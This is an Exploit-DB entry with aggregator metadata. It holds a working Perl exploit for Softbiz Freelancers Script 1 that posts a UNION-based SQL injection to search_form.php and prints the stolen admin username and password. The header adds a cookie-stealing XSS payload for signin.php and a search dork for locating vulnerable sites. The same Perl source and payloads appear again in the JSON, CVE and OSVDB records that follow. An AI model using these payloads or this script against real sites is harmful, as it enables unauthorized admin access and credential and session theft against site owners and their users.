ID EDB-ID:4660
Type exploitdb
Reporter Khashayar Fereidani
Modified 2007-11-25T00:00:00
Description
Softbiz Freelancers Script v.1 Remote SQL Injection Exploit. CVE-2007-6124,CVE-2007-6125. Webapps exploit for php platform
#!/usr/bin/perl
#####################################################################################
#### Softbiz Freelancers Script V.1 ####
#### Multiple Remote Vulnerabilities (SQL Injection Exploit/XSS) ####
#####################################################################################
# #
#AUTHOR : IRCRASH (Dr.Crash) #
#Script Download : http://www.softbizscripts.com/ #
#DORK: "Search Projects" intitle:"The ultimate project website" #
#Our English Forum : http://ircrash.com/english/ #
# #
#####################################################################################
# < XSS > #
#XSS Address : http://Sitename/signin.php?errmsg=<script>alert(document.cookie);</script>
# #
#####################################################################################
# < SQL > #
#SQL Address : search_form.php?sb_showresult=1&sb_protype=999999%20union/**/select/**/0,CoNcAt(0x4c6f67696e3a,sb_admin_name,0x3c686579206578706c6f69743e2050617373776f72643a,sb_pwd,0x3c686579206578706c6f69743e),2/**/from/**/sbprj_admin/*
# #
#####################################################################################
# Our site : Http://IRCRASH.COM #
#####################################################################################
use LWP;
use HTTP::Request;
use Getopt::Long;
sub header
{
print "
****************************************************
* Softbiz Freelancers Script Sql Injection exploit *
****************************************************
*AUTHOR : IRCRASH (Dr.Crash) *
*Exploited by : Dr.Crash *
*Our Site : IRCRASH.COM *
****************************************************";
}
sub usage
{
print "
* Usage : perl $0 -url http://Sitename/
****************************************************
";
}
my %parameter = ();
GetOptions(\%parameter, "url=s");
$url = $parameter{"url"};
if(!$url)
{
header();
usage();
exit;
}
if($url !~ /\//){$url = $url."/";}
if($url !~ /http:\/\//){$url = "http://".$url;}
if(!$cat){$cat = 2;}
$bugfile = "/search_form.php?";
$sqlinjection = "999999%20union/**/select/**/0,CoNcAt(0x4c6f67696e3a,sb_admin_name,0x3c686579206578706c6f69743e2050617373776f72643a,sb_pwd,0x3c686579206578706c6f69743e),2/**/from/**/sbprj_admin/*";
$poststring = "sb_showresult=1&sb_protype=".$sqlinjection;
sub Exploit()
{
$requestpage = $url.$bugfile;
print "Requesting Page is ".$requestpage."\n";
my $req = HTTP::Request->new("POST",$requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req->referer($url);
$req->referer("http://IRCRASH.COM");
$req->content_type('application/x-www-form-urlencoded');
$contlen = length($poststring);
$req->header("content-length" => $contlen);
$req->content($poststring);
$response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string();
#Debug Modus delete # at beginning of next line
#print $content;
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/<hey exploit>/,$name);
$name = @name[0];
@password = split(/Password:/,$content);
$password = @password[1];
@password = split(/<hey exploit>/,$password);
$password = @password[0];
if(!$name && !$password)
{
print "\n\n";
print "!Exploit failed ! :( - Insert http:// in start of url address\n\n";
exit;
}
print "Username: ".$name."\n";
print "Password: " .$password."\n\n";
print "You can login in .$url/admin/\n";
print "Enjoy My friend .....\n";
}
#Starting;
print "\n\nExploiting...\n";
Exploit();
# milw0rm.com [2007-11-25]
{"id": "EDB-ID:4660", "hash": "7aca26ce5c95aeeead22d90ce74171f1", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Softbiz Freelancers Script 1 - Remote SQL Injection Exploit", "description": "Softbiz Freelancers Script v.1 Remote SQL Injection Exploit. CVE-2007-6124,CVE-2007-6125. Webapps exploit for php platform", "published": "2007-11-25T00:00:00", "modified": "2007-11-25T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/4660/", "reporter": "Khashayar Fereidani", "references": [], "cvelist": ["CVE-2007-6124", "CVE-2007-6125"], "lastseen": "2016-01-31T21:28:00", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 6.5, "vector": "NONE", "modified": "2016-01-31T21:28:00"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-6125", "CVE-2007-6124"]}, {"type": "osvdb", "idList": ["OSVDB:38907", "OSVDB:38908"]}], "modified": "2016-01-31T21:28:00"}, "vulnersScore": 6.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/4660/", "sourceData": "#!/usr/bin/perl\n#####################################################################################\n#### Softbiz Freelancers Script V.1 ####\n#### Multiple Remote Vulnerabilities (SQL Injection Exploit/XSS) ####\n#####################################################################################\n# #\n#AUTHOR : IRCRASH (Dr.Crash) #\n#Script Download : http://www.softbizscripts.com/ #\n#DORK: \"Search Projects\" intitle:\"The ultimate project website\" #\n#Our English Forum : http://ircrash.com/english/ #\n# #\n#####################################################################################\n# < XSS > #\n#XSS Address : http://Sitename/signin.php?errmsg=<script>alert(document.cookie);</script>\n# #\n#####################################################################################\n# < SQL > #\n#SQL Address : search_form.php?sb_showresult=1&sb_protype=999999%20union/**/select/**/0,CoNcAt(0x4c6f67696e3a,sb_admin_name,0x3c686579206578706c6f69743e2050617373776f72643a,sb_pwd,0x3c686579206578706c6f69743e),2/**/from/**/sbprj_admin/*\n# #\n#####################################################################################\n# Our site : Http://IRCRASH.COM #\n#####################################################################################\n \n \nuse LWP;\nuse HTTP::Request;\nuse Getopt::Long;\n \n \nsub header\n{\nprint \"\n****************************************************\n* Softbiz Freelancers Script Sql Injection exploit *\n****************************************************\n*AUTHOR : IRCRASH (Dr.Crash) *\n*Exploited by : Dr.Crash *\n*Our Site : IRCRASH.COM *\n****************************************************\";\n}\n \nsub usage\n{\n print \"\n* Usage : perl $0 -url http://Sitename/\n****************************************************\n\";\n} \n \n \nmy %parameter = ();\nGetOptions(\\%parameter, \"url=s\");\n \n$url = $parameter{\"url\"};\n \nif(!$url)\n{\nheader();\nusage();\nexit;\n}\n \nif($url !~ /\\//){$url = $url.\"/\";}\nif($url !~ /http:\\/\\//){$url = \"http://\".$url;}\n \nif(!$cat){$cat = 2;}\n$bugfile = \"/search_form.php?\";\n$sqlinjection = \"999999%20union/**/select/**/0,CoNcAt(0x4c6f67696e3a,sb_admin_name,0x3c686579206578706c6f69743e2050617373776f72643a,sb_pwd,0x3c686579206578706c6f69743e),2/**/from/**/sbprj_admin/*\";\n$poststring = \"sb_showresult=1&sb_protype=\".$sqlinjection;\n \n \n \nsub Exploit()\n{\n$requestpage = $url.$bugfile;\nprint \"Requesting Page is \".$requestpage.\"\\n\";\n \nmy $req = HTTP::Request->new(\"POST\",$requestpage);\n$ua = LWP::UserAgent->new;\n$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );\n#$req->referer($url);\n$req->referer(\"http://IRCRASH.COM\");\n$req->content_type('application/x-www-form-urlencoded');\n$contlen = length($poststring);\n$req->header(\"content-length\" => $contlen);\n$req->content($poststring);\n \n$response = $ua->request($req);\n$content = $response->content;\n$header = $response->headers_as_string();\n \n#Debug Modus delete # at beginning of next line\n#print $content;\n \n@name = split(/Login:/,$content);\n$name = @name[1];\n@name = split(/<hey exploit>/,$name);\n$name = @name[0];\n \n@password = split(/Password:/,$content);\n$password = @password[1];\n@password = split(/<hey exploit>/,$password);\n$password = @password[0];\n \nif(!$name && !$password)\n{\nprint \"\\n\\n\";\nprint \"!Exploit failed ! :( - Insert http:// in start of url address\\n\\n\";\nexit;\n}\n \nprint \"Username: \".$name.\"\\n\";\nprint \"Password: \" .$password.\"\\n\\n\";\nprint \"You can login in .$url/admin/\\n\";\nprint \"Enjoy My friend .....\\n\";\n \n}\n \n#Starting;\nprint \"\\n\\nExploiting...\\n\";\nExploit();\n\n# milw0rm.com [2007-11-25]\n", "osvdbidlist": ["38908", "38907"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:09:02", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in search_form.php in Softbiz Freelancers Script 1 allows remote attackers to execute arbitrary SQL commands via the sb_protype parameter.", "modified": "2017-09-29T01:29:00", "id": "CVE-2007-6125", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-6125", "published": "2007-11-26T22:46:00", "title": "CVE-2007-6125", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:09:02", "bulletinFamily": "NVD", "description": "Cross-site scripting (XSS) vulnerability in signin.php in Softbiz Freelancers Script 1 allows remote attackers to inject arbitrary web script or HTML via the errmsg parameter.", "modified": "2017-09-29T01:29:00", "id": "CVE-2007-6124", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-6124", "published": "2007-11-26T22:46:00", "title": "CVE-2007-6124", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:34", "bulletinFamily": "software", "description": "## Vulnerability Description\nSoftbiz Freelancers Script contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'errmsg' variable upon submission to the 'signin.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nSoftbiz Freelancers Script signin.php errmsg Variable XSS\n## Manual Testing Notes\nhttp://[target]/signin.php?errmsg=<script>alert(document.cookie);</script>\n## References:\n[Secunia Advisory ID:27808](https://secuniaresearch.flexerasoftware.com/advisories/27808/)\n[Related OSVDB ID: 38908](https://vulners.com/osvdb/OSVDB:38908)\nOther Advisory URL: http://milw0rm.com/exploits/4660\nISS X-Force ID: 38615\nGeneric Exploit URL: http://www.milw0rm.com/exploits/4660\n[CVE-2007-6124](https://vulners.com/cve/CVE-2007-6124)\nBugtraq ID: 26569\n", "modified": "2007-11-25T00:00:00", "published": "2007-11-25T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:38907", "id": "OSVDB:38907", "title": "Softbiz Freelancers Script signin.php errmsg Variable XSS", "type": "osvdb", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:34", "bulletinFamily": "software", "description": "## Manual Testing Notes\nsearch_form.php?sb_showresult=1&sb_protype=999999%20union/**/select/**/0,CoNcAt(0x4c6f67696e3a,sb_admin_name,0x3c686579206578706c6f69743e2050617373776f72643a,sb_pwd,0x3c686579206578706c6f69743e),2/**/from/**/sbprj_admin/*\n## References:\n[Secunia Advisory ID:27808](https://secuniaresearch.flexerasoftware.com/advisories/27808/)\n[Related OSVDB ID: 38907](https://vulners.com/osvdb/OSVDB:38907)\nOther Advisory URL: http://milw0rm.com/exploits/4660\nISS X-Force ID: 38616\n[CVE-2007-6125](https://vulners.com/cve/CVE-2007-6125)\nBugtraq ID: 26569\n", "modified": "2007-11-25T00:00:00", "published": "2007-11-25T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:38908", "id": "OSVDB:38908", "title": "Softbiz Freelancers Script search_form.php sb_protype Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
